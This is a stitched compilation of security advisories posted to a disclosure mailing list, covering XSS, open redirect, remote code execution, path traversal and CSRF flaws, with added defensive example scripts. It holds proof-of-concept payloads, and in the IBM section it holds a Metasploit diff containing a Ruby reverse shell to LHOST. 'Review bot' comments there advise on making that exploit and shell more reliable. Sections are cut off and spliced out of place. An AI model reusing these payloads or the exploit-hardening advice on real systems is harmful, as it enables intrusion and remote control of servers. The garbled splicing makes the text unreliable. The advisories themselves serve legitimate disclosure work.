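    parser = SiteListParser()
    parser.feed(page_html)
    parser.close()
    return [v.strip() for v in parser.options if not is_plain_site_url(v.strip())]


if __name__ == "__main__":
    for entry in suspicious_site_urls(SAMPLE_RD_PAGE):
        print("suspicious site-list entry:", entry)
```

Feed the script the output of the curl command above (saved to a file)
instead of SAMPLE_RD_PAGE to check a real relay; a clean site list yields
an empty result.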


Fix
===

Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.


Security Risk
=

As the relay diagnostics page is typically not frequented by
administrators and does not normally require authentication, it is
unlikely that the vulnerability can be exploited to automatically and
reliably attack administrative users and obtain their credentials.

Nevertheless, the ability to host arbitrary HTML and JavaScript code on
the relay diagnostics page, i.e. on a trusted system, may allow
attackers to conduct very convincing phishing attacks.

This vulnerability is therefore rated as a medium risk.


Timeline


2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-09-03 Vendor notified
2015-01-13 Vendor releases security bulletin and software upgrade
2015-02-04 Customer approves public disclosure
2015-02-10 Advisory released


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.



[FD] [RT-SA-2014-015] Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning
  Board 4.0

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the Tapatalk plugin for the WoltLab Burning Board forum software,
which allows attackers to inject arbitrary JavaScript code via URL
parameters.


Details
===

Product: Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0
Affected Versions: <= 1.0.0
Fixed Versions: 1.1.2
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://tapatalk.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-015
Advisory Status: published
CVE: CVE-2014-8869
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8869


Introduction


Tapatalk is an app built for interacting with discussion forums on
mobile devices. It differs from a forum’s mobile web skin in that it
offers the speed of a native app and a streamlined unified interface for
every forum a user subscribes to. Tapatalk also creates a unique
eco-system that allows forums to be searched and discovered by millions
of Tapatalk users which in turn promotes content, new memberships, and
interactions.

(from Tapatalk's Homepage)


More Details


The Tapatalk extension includes the PHP script welcome.php at the path

com.tapatalk.wbb4/files/mobiquo/smartbanner/welcome.php

which is accessible via the URL

http://www.example.com/mobiquo/smartbanner/welcome.php

on systems using the plugin. It outputs JavaScript code that includes
improperly encoded values from the two URL parameters app_android_id
and app_kindle_url. Depending on which parameter is present, its value
is assigned to the PHP variable $byo:


<?php
[...]
else if (isset($_GET['app_android_id']))
{
  $app_android_id = $_GET['app_android_id'];
  if ($app_android_id && $app_android_id != '-1')
    $byo = "&app_android_id=$app_android_id";
}
else if (isset($_GET['app_kindle_url']))
{
  $app_kindle_url = $_GET['app_kindle_url'];
  if ($app_kindle_url && $app_kindle_url != '-1')
    $byo = "&app_kindle_url=$app_kindle_url";
}


Later the $byo variable is used to build a URL without URL encoding it
and the URL is used without further encoding in a script element:


<?php
[...]
$ads_url = $protocol.'tapatalk.com/welcome_screen.php'
        .'?referer='.urlencode($referer)
        .'&code='.urlencode($code)
        .'&board_url='.urlencode($board_url)
        .'&lang='.urlencode($lang)
        .$byo
        .'&callback=?';
[...]
?>[...]

<script>$.getJSON("<?php echo $ads_url; ?>",function(data){
[...]



Proof of Concept


The following URL can be used to demonstrate the vulnerability:

http://www.example.com/mobiquo/smartbanner/welcome.php
  ?app_kindle_url=");alert('RedTeam Pentesting');</script><!--

The result is a notification showing the text RedTeam Pentesting.


Workaround
==

The PHP function urlencode() should be used to encode the $byo variable
before building a URL with it.
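The following Python 3 code is an added example, not the plugin's code:
it re-creates the $ads_url construction shown above in both variants,
raw concatenation of $byo as in the vulnerable plugin and the urlencode()
of the workaround (quote_plus is Python's equivalent), embeds the result
in the same <script> context and checks whether the proof-of-concept
payload still terminates the script element. The board URL and language
values are assumed placeholders; the query parameter names are the
plugin's.

```python
from urllib.parse import parse_qs, quote_plus, urlsplit

# Payload from the advisory's proof of concept: closes the JS string and
# the $.getJSON() call, runs attacker code, then ends the script element.
PAYLOAD = "\");alert('RedTeam Pentesting');</script><!--"

# Assumed placeholder values for the demonstration.
BOARD_URL = "http://www.example.com/"
LANG = "en"


def build_ads_url(board_url, lang, byo=None, encode_byo=True):
    """Re-create welcome.php's $ads_url construction.

    quote_plus() behaves like PHP's urlencode() (spaces become '+').
    byo is an optional (parameter, value) pair, i.e. the $byo fragment.
    encode_byo=False concatenates the value raw, as the vulnerable plugin
    did; encode_byo=True encodes it like the other parameters."""
    url = ("https://tapatalk.com/welcome_screen.php"
           "?board_url=" + quote_plus(board_url) +
           "&lang=" + quote_plus(lang))
    if byo is not None:
        name, value = byo
        if value and value != "-1":          # same guard as the PHP code
            url += "&%s=%s" % (name, quote_plus(value) if encode_byo else value)
    return url + "&callback=?"


def embed_in_script(ads_url):
    """The inline script element as the page emits it: the URL sits inside
    a JavaScript string literal without any escaping."""
    return '<script>$.getJSON("%s",function(data){});</script>' % ads_url


def script_boundary_injected(markup):
    """True if an attacker value broke out of the string: the page then
    contains more than the single script element the template emits."""
    lower = markup.lower()
    return lower.count("<script") > 1 or lower.count("</script>") > 1


def kindle_param_roundtrip(ads_url):
    """What the remote endpoint actually receives for app_kindle_url."""
    return parse_qs(urlsplit(ads_url).query).get("app_kindle_url", [None])[0]


def vulnerable_ads_url():
    return build_ads_url(BOARD_URL, LANG, ("app_kindle_url", PAYLOAD), encode_byo=False)


def fixed_ads_url():
    return build_ads_url(BOARD_URL, LANG, ("app_kindle_url", PAYLOAD), encode_byo=True)


if __name__ == "__main__":
    for label, url in (("vulnerable", vulnerable_ads_url()), ("fixed", fixed_ads_url())):
        print(label, "script boundary injected:", script_boundary_injected(embed_in_script(url)))
    print("fixed variant still delivers the value intact:",
          kindle_param_roundtrip(fixed_ads_url()) == PAYLOAD)
```

Encoding the value does not destroy it: after percent-encoding the remote
side still receives the original app_kindle_url string, but no quote, angle
bracket or slash survives in the emitted page, so the string literal in
$.getJSON() cannot be closed early.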


Fix
===

Update the plugin to version 1.1.2.


Security Risk
=

This security vulnerability is rated as a high risk. It allows attackers
to execute arbitrary JavaScript code in users' browsers if they access
URLs prepared by attackers, which opens up many possibilities for further
attacks against these users. Since the plugin is used for a bulletin
board, the vulnerability could be exploited to display a fake login page
and obtain credentials from users or administrators. The vulnerability
also affects other web applications hosted on the same domain.


Timeline


2014-10-20 Vulnerability identified
2014-10-29 CVE number requested
2014-11-14 CVE number assigned
2014-11-26 Vendor notified via https://tapatalk.com/security.php
2014-12-16 Vendor notified again, received reply from vendor
2014-12-16 Vulnerability patched in SCM [0]
2014-12-23 Updated plugin released by vendor [1]
2015-01-08 Vendor updated release notes to mention XSS [2]
2015-01-12 Advisory released


References
==

[0] https://github.com/tapatalk/tapatalk-wbb/commit/71024545904024cea9d04a887fdc64b9a9b85871
[1] https://github.com/tapatalk/tapatalk-wbb/commit/31472f6fcfffacd698b0c20809c4a8fb3c4f32f9
[2] https://support.tapatalk.com/threads/19540/#post-146253


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security

[FD] CVE-2014-8870: Arbitrary Redirect in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
The Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 prior to
version 1.1.2 allowed to redirect users to arbitrary URLs. This was possible by
specifying the target URL in the URL parameter board_url in URLs like the
following:

http://www.example.com/mobiquo/smartbanner/welcome.php?board_url=https://www.redteam-pentesting.de

CVE-2014-8870 was assigned to this issue.


[FD] [RT-SA-2014-012] Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components

2014-12-02 Thread RedTeam Pentesting GmbH
 outside of the Rails process
-  # Otherwise, the session can be killed on timeout
+  # This stub tries to ensure that the payload runs outside of the Rails
+  # process Otherwise, the session can be killed on timeout
   #
   def detached_payload_stub(code)
   %Q^
 code = '#{ Rex::Text.encode_base64(code) }'.unpack(m0).first
-if RUBY_PLATFORM =~ /mswin|mingw|win32/
-  inp = IO.popen(ruby, wb) rescue nil
-  if inp
-inp.write(code)
-inp.close
-  end
+if RUBY_PLATFORM =~ /mswin|mingw|win32/ and inp = (IO.popen(ruby, wb) 
rescue nil)
+  inp.write(code)
+inp.close
 else
-  Kernel.fork do
+  def _fork
+begin
+  Kernel.fork
+rescue NotImplementedError
+  -1
+end
+  end
+  pid = _fork
+  if 0 == pid or -1 == pid
 eval(code)
   end
 end
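Review bot: The fork branch regresses process lifetime. The removed code ran the payload inside a Kernel.fork block, so the child exited as soon as the block returned; the new code calls Kernel.fork without a block and runs eval(code) under 'if 0 == pid or -1 == pid', after which the forked child simply continues executing the rest of the Rails request. Add an explicit exit! after eval(code) on the 0 == pid path (not on the -1 path, where the payload deliberately runs inline because fork raised NotImplementedError). Minor: the rewrapped comment lost its sentence break, 'process Otherwise' should read 'process. Otherwise'.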
@@ -234,7 +239,7 @@ class Metasploit3  Msf::Exploit::Remote
   'method' = datastore['HTTP_METHOD'],
 }, 25)
 if res  !res.get_cookies.empty?
-  match = 
res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /)
+  match = 
res.get_cookies.match(/([_A-Za-z0-9-]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+);/)
 end
 
 if match
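Review bot: The new cookie regex still ends in a literal ';', so a Set-Cookie value in which the session cookie is the last (or only) cookie and has no trailing semicolon is never matched and 'match' stays nil. Since the change already drops the mandatory trailing space, finish the job by making the terminator optional, e.g. '(?:;|$)' instead of ';'. Permitting '-' in the cookie name is fine.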
diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb 
b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
index f17c669..0100929 100644
--- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
@@ -37,8 +37,31 @@ module Metasploit3
   def ruby_string
 lhost = datastore['LHOST']
 lhost = [#{lhost}] if Rex::Socket.is_ipv6?(lhost)
-require 'socket';c=TCPSocket.new(\#{lhost}\, 
#{datastore['LPORT'].to_i}); +
-
$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next
 if l.length==0; +
-(IO.popen(l,\rb\){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil 
}
+ruby = -EOF
+require 'socket'
+c=TCPSocket.new(#{lhost}, #{datastore['LPORT'].to_i})
+def reopen(old, new)
+  begin
+old.reopen(new)
+  rescue IOError = e
+new
+  end
+end
+
+$stdin = reopen($stdin, c)
+$stdout = reopen($stdout, c)
+$stderr = reopen($stderr, c)
+$stdin.each_line{ |l| l=l.strip
+
+next if l.length==0
+
+(IO.popen(l,rb) { |fd|
+fd.each_line { |o|
+c.puts(o.strip)
+}
+}) rescue nil
+}
+EOF
+ruby
   end
 end
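Review bot: In the reopen helper the rescue clause binds 'e' but never uses it; write 'rescue IOError' and add a one-line comment stating why reopening may fail, because the fallback is not equivalent: when old.reopen(new) succeeds the process's own descriptors 0-2 point at the socket, whereas the fallback only rebinds the Ruby globals $stdin/$stdout/$stderr, so commands started by IO.popen(l, "rb") do not inherit the socket as their stdin. The payload still works because command output is relayed explicitly through c.puts, but that distinction belongs in the comment.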



Workaround
==

It might be possible to binary patch the Java class files to use a
different secret_token value and redeploy the application. This is
untested, however.


Fix
===

Install version 9.0.60100 of the affected software components.


Security Risk
=

The vulnerability allows unauthenticated remote attackers to execute
arbitrary code with administrative privileges on the affected systems.
It is highly likely that a successful attack on the application server
can also be leveraged into a full compromise of all devices managed
through the product. This constitutes a high risk.


Timeline


2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-08-15 Vendor notified, vendor acknowledges receiving the advisory
2014-09-03 Update requested from vendor
2014-09-05 Vendor promises to respond with more details
2014-09-26 Update requested from vendor
2014-09-30 Vendor promises to respond with more details
2014-10-16 Update requested from vendor
2014-10-16 Vendor responds with CVE-ID, plans release for mid-November
2014-11-06 More definite release schedule requested
2014-11-12 Vendor plans release for last week of November
2014-11-21 Additional details requested from vendor
2014-11-22 Vendor responds with details, postpones release to
   mid-December due to issues discovered during quality control
2014-12-01 Vendor announces imminent release
2014-12-01 Vendor releases security bulletin and software upgrade
2014-12-02 Customer approves public disclosure
2014-12-02 Advisory released


References
==

[0] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/rails_secret_deserialization.rb


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


[FD] [RT-SA-2014-007] Remote Code Execution in TYPO3 Extension ke_dompdf

2014-12-01 Thread RedTeam Pentesting GmbH
Advisory: Remote Code Execution in TYPO3 Extension ke_dompdf

During a penetration test RedTeam Pentesting discovered a remote code
execution vulnerability in the TYPO3 extension ke_dompdf, which allows
attackers to execute arbitrary PHP commands in the context of the
webserver. 


Details
===

Product: ke_dompdf TYPO3 extension
Affected Versions: 0.0.3=
Fixed Versions: 0.0.5
Vulnerability Type: Remote Code Execution
Security Risk: high
Vendor URL: http://typo3.org/extensions/repository/view/ke_dompdf
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-007
Advisory Status: published
CVE: CVE-2014-6235
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6235


Introduction


DomPDF library and a small pi1 to show how to use DomPDF to render the
current typo3-page to pdf.
(taken from the extension's description)


More Details


The TYPO3 extension ke_dompdf contains a version of the dompdf library
including all files originally supplied with it. This includes an
examples page, which demonstrates different HTML elements rendered as a
PDF. The page also allows users to enter their own HTML code into a text
box to be rendered by the webserver using dompdf. dompdf also supports
rendering of PHP files, and the examples page accepts PHP code tags,
which are then executed on the server and their output rendered into the
PDF.

Since those files are not protected in the TYPO3 extension directory,
anyone can access this URL and execute arbitrary PHP code on the system.
This behaviour was already fixed in the dompdf library, but the TYPO3
extension ke_dompdf ships an old version of the library that still
allows the execution of arbitrary PHP code.


Proof of Concept


Access examples.php on the vulnerable system:
http://www.example.com/typo3conf/ext/ke_dompdf/res/dompdf/www/examples.php

Enter PHP code in the text box on the bottom of the page and click the
submit button, for example:


<?php phpinfo() ?>


The page will return a PDF file containing the output of the PHP code.


Workaround
==

Remove the directory www containing the examples.php file, or at least
the examples.php file itself, from the extension's directory.


Fix
===

Update to version 0.0.5 of the extension.


Security Risk
=

high


Timeline


2014-04-21 Vulnerability identified
2014-04-30 Customer approved disclosure to vendor
2014-05-06 CVE number requested
2014-05-10 CVE number assigned
2014-05-13 Vendor notified
2014-05-20 Vendor works with TYPO3 security team on a fix
2014-09-02 Vendor released fixed version [2]
2014-12-01 Advisory released


References
==

The TYPO3 extension ke_dompdf contains an old version of the dompdf
library, which contains an example file that can be used to execute
arbitrary commands.  This vulnerability was fixed in dompdf in 2010. The
relevant change can be found in the github repository of dompdf:

[1] https://github.com/dompdf/dompdf/commit/e75929ac6393653a56e84dffc9eac1ce3fb90216

TYPO3-EXT-SA-2014-010: Several vulnerabilities in third party extensions:

[2] http://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2014-010/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


[FD] [RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution

2014-06-26 Thread RedTeam Pentesting GmbH
 (%r) %
scriptname)
return
[...]
[...]

For HTTP GET requests, do_GET() first invokes send_head(). That method
calls is_cgi() to determine whether the requested path is to be executed
as a CGI script. The is_cgi() method uses _url_collapse_path() to
normalize the path, i.e. to remove extraneous slashes (/), current
directory (.) or parent directory (..) elements, taking care not to
permit directory traversal below the document root. The is_cgi() method
returns True when the first path element is contained in the
cgi_directories list. As _url_collapse_path() and is_cgi() never URL
decode the path, replacing the forward slash after the CGI directory in
the URL of a CGI script with the URL encoded variant %2f leads to
is_cgi() returning False. CGIHTTPRequestHandler's send_head() then
invokes its parent's send_head() method, which translates the URL path
to a file system path using the translate_path() method and outputs the
file's contents raw. As translate_path() URL decodes the path, this
succeeds and discloses the CGI script's file contents:

$ curl http://localhost:8000/cgi-bin%2ftest.py
#!/usr/bin/env python2
import json
import sys

db_credentials = "SECRET"
sys.stdout.write("Content-type: text/json\r\n\r\n")
sys.stdout.write(json.dumps({"text": "This is a Test"}))

Similarly, the CGIHTTPRequestHandler can be tricked into executing CGI
scripts that would normally not be executable. The class normally only
allows executing CGI scripts that are direct children of one of the
directories listed in cgi_directories. Furthermore, only direct
subdirectories of the document root (the current working directory) can
be valid CGI directories.

This can be seen in the following example. Even though the sample server
shown above includes /cgi-bin/subdir as part of the request handler's
cgi_directories, a CGI script named test.py in that directory is not
executed:

$ curl http://localhost:8000/cgi-bin/subdir/test.py
[...]
<p>Error code 403.
<p>Message: CGI script is not a plain file ('/cgi-bin/subdir').
[...]

Here, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and
returned True. Next, run_cgi() further dissected these paths to perform
some sanity checks, thereby mistakenly assuming subdir to be the
executable script's filename and test.py to be path info. As subdir is
not an executable file, run_cgi() returns an error message. However, if
the forward slash between subdir and test.py is replaced with %2f,
invoking the script succeeds:

$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py
{"text": "This is a Test"}

This is because neither is_cgi() nor run_cgi() URL decode the path
during processing until run_cgi() tries to determine whether the target
script is an executable file. More specifically, as subdir%2ftest.py
does not contain a forward slash, it is not split into the script name
subdir and path info test.py, as in the previous example.

Similarly, using URL encoded forward slashes, executables outside of a
CGI directory can be executed:

$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py
{"text": "This is a Test"}


Workaround
==

Subclass CGIHTTPRequestHandler and override the is_cgi() method with a
variant that first URL decodes the supplied path, for example:

import urllib
import CGIHTTPServer

class FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):
    def is_cgi(self):
        # URL decode before the stdlib normalises and inspects the path
        self.path = urllib.unquote(self.path)
        return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)
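To make the order-of-operations problem concrete, here is an added
Python 3 example (neither the stdlib code nor the advisory's) that
re-implements the relevant classification steps in simplified form: a
collapse_path() that normalises like _url_collapse_path() without
decoding, an is_cgi() that can optionally decode first, as the
workaround above does, and a cgi_target() that splits the remaining path
the way run_cgi() does. It is run over the four request paths used in
the More Details section; the CGI directory list is the stdlib default.

```python
from urllib.parse import unquote

# Default cgi_directories of CGIHTTPServer.CGIHTTPRequestHandler.
CGI_DIRECTORIES = ["/cgi-bin", "/htbin"]


def collapse_path(path):
    """Simplified re-implementation of _url_collapse_path(): drop the query
    string, remove empty, '.' and '..' elements and never rise above the
    document root. Like the original it does NOT percent-decode, which is
    the root cause described in the advisory."""
    path = path.split("?", 1)[0]
    parts = []
    for part in path.split("/"):
        if part == "..":
            if parts:
                parts.pop()
        elif part and part != ".":
            parts.append(part)
    return "/" + "/".join(parts)


def split_cgi_path(collapsed):
    """First element is the candidate CGI directory, the rest is the script
    plus possible PATH_INFO, mirroring how is_cgi() fills cgi_info."""
    dir_sep = collapsed.find("/", 1)
    if dir_sep == -1:
        return collapsed, ""
    return collapsed[:dir_sep], collapsed[dir_sep + 1:]


def is_cgi(path, cgi_directories=CGI_DIRECTORIES, decode_first=False):
    """Return (is_cgi, directory, tail). decode_first=False is the vulnerable
    order (normalise the raw path); decode_first=True is the workaround:
    percent-decode before normalising."""
    if decode_first:
        path = unquote(path)
    head, tail = split_cgi_path(collapse_path(path))
    return head in cgi_directories, head, tail


def cgi_target(tail):
    """How run_cgi() turns the tail into (script name, PATH_INFO): it splits
    at the first literal '/' and decodes the script name only afterwards,
    when looking it up on disk. A %2f therefore keeps a nested path inside
    the script name instead of acting as a path separator."""
    i = tail.find("/")
    script, path_info = (tail[:i], tail[i:]) if i >= 0 else (tail, "")
    return unquote(script), path_info


def classify(path):
    """Where a request ends up under the vulnerable and the fixed order."""
    outcomes = {}
    for label, decode_first in (("vulnerable", False), ("fixed", True)):
        cgi, head, tail = is_cgi(path, decode_first=decode_first)
        if not cgi:
            # falls through to SimpleHTTPRequestHandler.send_head(), which
            # decodes the path and serves the file's raw bytes
            outcomes[label] = "static file: " + unquote(path)
        else:
            script, path_info = cgi_target(tail)
            outcomes[label] = "run_cgi(script=%s/%s, path_info=%r)" % (head, script, path_info)
    return outcomes


if __name__ == "__main__":
    for request in ("/cgi-bin/test.py",
                    "/cgi-bin%2ftest.py",
                    "/cgi-bin/subdir%2ftest.py",
                    "/cgi-bin/..%2ftraversed.py"):
        print(request, classify(request))
```

Running the script shows, for each request, where the two handlers route
it: in the vulnerable order the %2f variants are either served as static
files (source disclosure) or reach run_cgi() with a nested or traversing
path still folded into the script name, while decoding first makes them
behave like their plain-slash counterparts.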


Fix
===

Update to the latest Python version from the Mercurial repository at
http://hg.python.org/cpython/


Security Risk
=

The vulnerability can be used to gain access to the contents of CGI
binaries or the source code of CGI scripts. This may reveal sensitive
information, for example access credentials. This can greatly help
attackers in mounting further attacks and is therefore considered to
pose a high risk. Furthermore, attackers may be able to execute code that
was not intended to be executed. However, this is limited to files
stored in the server's working directory or in its subdirectories.

The CGIHTTPServer code does contain this warning:

"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL"

Even when used on a local computer this may allow other local users to
execute code in the context of another user.


Timeline


2014-04-07 Vulnerability identified
2014-06-11 Customer approved disclosure to vendor
2014-06-11 Vendor notified
2014-06-15 Vendor disclosed vulnerability in their public bug tracker
   and addressed it in public source code repository
2014-06-23 CVE number requested
2014-06-25 CVE number assigned
2014-06-26 Advisory released


References
==

http://bugs.python.org/issue21766


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks

[FD] [RT-SA-2013-002] Endeca Latitude Cross-Site Request Forgery

2014-06-25 Thread RedTeam Pentesting GmbH
Advisory: Endeca Latitude Cross-Site Request Forgery

RedTeam Pentesting discovered a Cross-Site Request Forgery (CSRF)
vulnerability in Endeca Latitude. Using this vulnerability, an attacker
might be able to change several different settings of the Endeca
Latitude instance or disable it entirely.


Details
===

Product: Endeca Latitude
Affected Versions: 2.2.2, potentially others
Fixed Versions: N/A
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: N/A
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-002
Advisory Status: published
CVE:  CVE-2014-2399
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2399


Introduction


Endeca Latitude is an enterprise data discovery platform for advanced,
yet intuitive, exploration and analysis of complex and varied data.
Information is loaded from disparate source systems and stored in a
faceted data model that dynamically supports changing data. This
integrated and enriched data is made available for search, discovery,
and analysis via interactive and configurable applications.

(from the vendor's homepage)


More Details


Endeca Latitude offers administrators the ability to perform different
administrative and configuration operations by accessing URLs. These
URLs are not protected by a randomly generated token and are therefore
prone to Cross-Site Request Forgery attacks.

For example, by accessing the URL http://example.com/admin?op=exit an
administrator can shut down the Endeca Latitude instance. Several other
URLs exist (as documented at [1] and [2]) which can be used to trigger
operations such as flushing caches or changing the logging settings.


Proof of Concept


An attacker might prepare a website which triggers arbitrary
functionality (see [1] and [2]) of an Endeca Latitude instance as soon
as someone opens it in a browser that can reach Endeca Latitude. An easy
way to implement this is to embed hidden images into an arbitrary
website which use the corresponding URLs as their source:

<img src="http://example.com/admin?op=exit" style="display:hidden" />
<img src="http://example.com/config?op=log-disable" style="display:hidden" />
[...]


Workaround
==

The vendor did not update the vulnerable software, but recommends
configuring all installations to require mutual authentication using TLS
certificates for both servers and clients, while discouraging users from
installing said client certificates in browsers.


Fix
===

Not available. The vendor did not update the vulnerable software to
remedy this issue.


Security Risk
=

The vulnerability enables attackers to interact with an Endeca Latitude
instance in different ways. Possible attacks include changing settings
as well as denying service by shutting down a running instance.
Attackers mainly benefit from this vulnerability if the instance is not
already available to them, but for example only to restricted IP
addresses or after authentication. Since this makes it harder to
identify potential target systems and the attack mainly allows
disrupting the service until it is restarted, the risk of this
vulnerability is considered to be low.


Timeline
========

2013-10-06 Vulnerability identified
2013-10-08 Customer approved disclosure to vendor
2013-10-15 Vendor notified
2013-10-17 Vendor responded that investigation/fixing is in progress
2014-02-24 Vendor responded that bug is fixed and scheduled for a future
   CPU
2014-03-13 Vendor responded with additional information about a
   potential workaround
2014-04-15 Vendor releases Critical Patch Update Advisory with little
   information on the proposed fix
2014-04-16 More information requested from vendor
2014-05-02 Vendor responds with updated information
2014-06-25 Advisory released


References
==

[1] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/toc.htm#List%20of%20administrative%20operations
[2] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/toc.htm#List%20of%20supported%20logging%20variables


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                              https://www.redteam-pentesting.de
Germany

[FD] [RT-SA-2013-003] Endeca Latitude Cross-Site Scripting

2014-06-25 Thread RedTeam Pentesting GmbH
Advisory: Endeca Latitude Cross-Site Scripting

RedTeam Pentesting discovered a Cross-Site Scripting (XSS)
vulnerability in Endeca Latitude. By exploiting this vulnerability an
attacker is able to execute arbitrary JavaScript code in the context
of other Endeca Latitude users.


Details
===

Product: Endeca Latitude
Affected Versions: 2.2.2, potentially others
Fixed Versions: N/A
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: N/A
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-003
Advisory Status: published
CVE:  CVE-2014-2400
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2400


Introduction
============

Endeca Latitude is an enterprise data discovery platform for advanced,
yet intuitive, exploration and analysis of complex and varied data.
Information is loaded from disparate source systems and stored in a
faceted data model that dynamically supports changing data. This
integrated and enriched data is made available for search, discovery,
and analysis via interactive and configurable applications.

(from the vendor's homepage)


More Details
============

Endeca Latitude allows administrators to trigger different functions by
using the following two URLs (see [1]):

 * http://example.com/config?op=supported-operation
 * http://example.com/admin?op=supported-operation

When such a URL is accessed with an invalid value for the HTTP GET
parameter op, such as
http://example.com/config?op=RedTeam%20Pentesting, the web application
shows an error message in which the invalid value is embedded directly
into the document without prior escaping, which leads to a Cross-Site
Scripting vulnerability.


Proof of Concept
================

As shown by the following URL, an attacker is able to embed arbitrary
JavaScript code into the context of the Endeca Latitude instance:

http://example.com/config?op=<script>alert('RedTeam Pentesting');</script>

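As an added example (not code from the advisories or from the vendor), the following Python sketch of an op-style dispatcher shows the two fixes the Endeca advisories RT-SA-2013-002 and RT-SA-2013-003 call for: the state-changing operations op=exit and op=log-disable are only executed on a POST that carries a per-session secret token, so a hidden image on a foreign page cannot trigger them, and an unsupported op value is reflected in the error message only after HTML-escaping. The handler bodies and the read-only "status" operation are hypothetical stand-ins.

```python
import hmac
import html
import secrets
from urllib.parse import parse_qs, urlsplit

# State-changing operations named in the advisories' example URLs; the
# handler bodies are hypothetical stand-ins that flip flags in `state`.
STATE_CHANGING_OPS = {
    "exit": lambda state: state.update(running=False),
    "log-disable": lambda state: state.update(logging=False),
}
# A hypothetical read-only operation that is harmless to serve over GET.
READ_ONLY_OPS = {
    "status": lambda state: f"running={state['running']} logging={state['logging']}",
}


def new_session():
    """Login creates a session holding a random, per-session CSRF token."""
    return {"csrf_token": secrets.token_urlsafe(32)}


def handle(method, url, form, session, state):
    """Dispatch one admin/config request; returns (HTTP status, body)."""
    op = parse_qs(urlsplit(url).query).get("op", [""])[0]
    if op in READ_ONLY_OPS:
        return 200, READ_ONLY_OPS[op](state)
    if op in STATE_CHANGING_OPS:
        # CSRF fix: a GET (e.g. from a hidden <img>) never changes state,
        # and a POST must carry the token only same-origin pages can read.
        if method != "POST":
            return 405, "state-changing operations require POST"
        token = form.get("csrf_token", "")
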